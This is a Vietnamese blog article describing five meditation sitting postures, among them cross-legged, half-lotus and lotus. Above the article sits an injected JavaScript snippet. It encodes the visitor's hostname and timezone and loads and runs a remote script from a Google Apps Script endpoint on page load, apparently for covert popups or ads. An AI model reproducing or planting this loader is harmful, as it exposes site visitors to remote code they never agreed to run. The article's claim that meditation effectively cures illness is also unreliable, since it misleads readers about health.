var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

5 Tư thế ngồi thiền đúng cách mà ai cũng nên biết

Sau một ngày làm việc mệt mỏi, bạn ngồi thiền và hít thở đúng cách không những mang lại cho bản thân một tinh thần thoải mái, mà còn giúp bạn đẩy lùi nhiều loại bệnh. Tuy nhiên, không phải ai cũng biết cách ngồi thiền đúng cách. Trong bài viết này, UNICA sẽ “bật mí” cho bạn 5 tư thế ngồi thiền chuẩn xác và được nhiều người lựa chọn nhất. Các bạn hãy tham khảo bài viết của Unica dưới đây nhé!

1. Tư thế ngồi thiền xếp bằng

Có thể nói đây là một tư thế ngồi thiền dễ dàng và phổ biến nhất cho bất cứ ai muốn ngồi học Thiền cũng có thể làm được. Để ngồi thiền đúng cách với tư thế này, bạn chỉ cần ngồi khoanh tròn chân lại, lưng phải thẳng, mắt nhắm lại và 2 tay thả lòng đặt nhẹ nhàng lên đầu gối hoặc bạn có thể tay dặt hình bắt ấn Tam muội.

>>> Xem ngay: Công dụng và cách thở bằng bụng hiệu quả thần kỳ

ngoi-thien-dung-cach-1

Hình ảnh minh họa tư thế ngồi xếp bằng khi thiền

Tuy nhiên, đây là một kiểu ngồi chỉ dành cho những người mới “bước chân vào cửa thiền”, chưa thể ngồi theo những kiểu khó hay phức tạp. Hoặc đối với những người lớn tuổi, xương khớp không còn săn chắc, dẻo dai, khó uốn để thiền thì nên lựa chọn tư thế ngồi xếp bằng.

Ngoài ra, bạn cần lưu ý rằng đây là tư thế ngồi tạm thời. Khi các cơ khớp của bạn đã quen dẫn với việc ngồi thiền thì bạn cần lựa chọn những phương pháp thiền khác để đạt hiệu quả cao hơn cho sức khỏe.

Nhược điểm của tư thế này ngồi lâu sẽ khiến cho lưng của bạn bị mỏi, lưng dần trở nên gù và bị ngả nhiều về phía trước. Chính vì lý do đó, bạn cần hạn chế ngồi lâu tư thế ngồi xếp bằng để không ảnh hưởng đến cuộc sống.

2. Tư thế ngồi thiền bán già

Nghe tên tư thế ngồi, có khá nhiều người sẽ đoán già đoán non rằng nó sẽ được thực hiện như thế nào đúng không? Hình dung đơn giản, nó là tư thế ngồi thiền kết hợp giữa tư thế ngồi đơn giản và phức tạp. Và để làm được nó, bạn chỉ cần ngồi xuống và gác 1 chân lên bắp chân còn lại.

Tư thế ngồi thiền đúng cách này sẽ giúp bạn ngồi ngay ngắn mà không lo bị nghiêng ngả hay lo lắng bị gù lưng khi thiền sâu. Có một mẹo nhỏ cho bạn nếu ngồi thiền tư thế này là hãy tập một vài động tác cơ bản để thả lỏng cơ thể, đôi chân, háng, bắp cổ, lưng để tránh bị đau xương khớp và đạt kết quả ngồi thiền cao nhất.

3. Tư thế hoa sen

Tư thế ngồi thiền này còn được gọi với cái tên quốc tế là Padmasana hay còn gọi biết đến với tư thế ngồi kiết già. Nó có thể được coi là tư thế phổ biến nhất thế giới. Để thực hiện được thành công tư thế này, bạn cần ổn định và gối xếp bằng tự nhiên. Bạn dùng tay nắm lấy chân phải, từ từ gấp chân lại và đặt chân đó lên đùi trái, gót chân phải ép sát với bụng, lòng bàn chân ngửa lên trời. Bạn thực hiện với chân còn lại y hệt như thế. Hai bàn tay của bạn để tư thế nắm hình Tam muội, tay song song với bả vai và đầu ngón tay chạm xuống đất.

Ngoài ra, lưng bạn cần thẳng, không được cong vẹo nếu không sẽ ảnh hưởng đến dòng năng lượng luân chuyển bên trong xương sống. Hơn nữa, bạn cần chú ý phải thả lỏng các cơ mặt, không được gồng mình.

ngoi-thien-dung-cach-3

Hình ảnh minh họa tư thế ngồi thiền hoa sen bình yên trên biển

Đây là tư thế cần đến tính kiên trì luyện tập nếu muốn có một sức khỏe tốt, một cơ thể dẻo dai và một tinh thần thoải mái.

4. Tư thế phần tư liên hoa

Với tư thế này, người tập có thể ngồi trên ghế ngồi thiền với tư thế tay chụm vào nhau và để trước ngực, hai chân đan chéo vào nhau và cả hai bàn chân nằm dưới đùi hoặc đầu gối dối diện. Với những người mới tập thiền thì nên áp dụng tư thế ngồi thiền này bởi nó dễ chịu, thoải mái và bạn có thể ngồi thiền lâu hơn.

ngoi-thien-dung-cach

Tư thế phần tư Liên Hoa

5. Tư thế bán liên hoa

Gọi là tư thế ngồi thiền Bán Liên Hoa vì tư thế này là sự kết hợp giữa tư thế ngồi thiền đơn giản và ngồi thiền phức tạp nhất. Với tư thế này, bạn chỉ cần ngồi xuống thảm tập Yoga, giữ cho lưng thẳng, gác một chân lên bắp chân kia. Với tư thế này, bạn có thể ngồi ngay ngắn mà không lo bị gù lưng.

Khi thực hiện tư thiền thiền Bán Liên Hoa đúng cách và không bị đau nhức chân, trước khi bắt đầu ngồi thiền, bạn nên khởi động bằng một vài động tác cơ bản nhằm thả lỏng cơ đùi, háng, lưng, cổ chân. Thời gian đầu mới tập luyện, bạn sẽ không tránh khỏi được tình trạng đau nhức do căng cơ gây ra. Nhưng nếu kiên trì và ngồi thiền đúng cách thì nhất định bạn sẽ nhanh chóng đạt đến độ cao nhất trong Thiền định.

>>> Xem ngay: Những lưu ý về cách ngồi thiền được lâu mà bạn cần biết

ngoi-thien-dung-cách

Tư thế bán liên hoa

UNICA đã chia sẻ cho bạn 5 tư thế ngồi thiền đúng cách để tập luyện đạt hiệu quả cao. Đồng thời, nếu bạn ngồi thiền thường xuyên nó sẽ là một cách giúp bạn chữa bệnh hiệu quả. Hy vọng rằng, bài viết trên sẽ hữu ích cho bạn rất nhiều trong phương pháp cải thiện sức khỏe.

Chúc các bạn thành công!

Tags: Thiền